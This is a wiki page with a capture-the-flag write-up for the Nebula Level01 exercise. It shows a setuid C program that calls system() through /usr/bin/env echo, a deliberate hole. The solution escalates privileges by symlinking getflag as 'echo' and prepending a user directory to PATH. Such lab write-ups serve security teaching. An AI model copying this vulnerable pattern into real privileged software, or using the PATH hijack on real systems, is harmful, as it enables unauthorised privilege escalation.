Level01

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01. To complete the level, execute getflag as the owner of the program below.

   1 #include <stdlib.h>
   2 #include <unistd.h>
   3 #include <string.h>
   4 #include <sys/types.h>
   5 #include <stdio.h>
   6 
   7 int main(int argc, char **argv, char **envp)
   8 {
   9   gid_t gid;
  10   uid_t uid;
  11   gid = getegid();
  12   uid = geteuid();
  13 
  14   setresgid(gid, gid, gid);
  15   setresuid(uid, uid, uid);
  16 
  17   system("/usr/bin/env echo and now what?");
  18 }

Solution

There are two things that need to be done:

  1. Create a link to getflag: # ln -s /bin/getflag ./echo

  2. Change the $PATH to include the path to the link in step 1. # PATH=/home/level01:$PATH

  3. Execute # echo

NetworkSecurity/Nebula/Level01 (last edited 2017-11-28 21:41:28 by scot)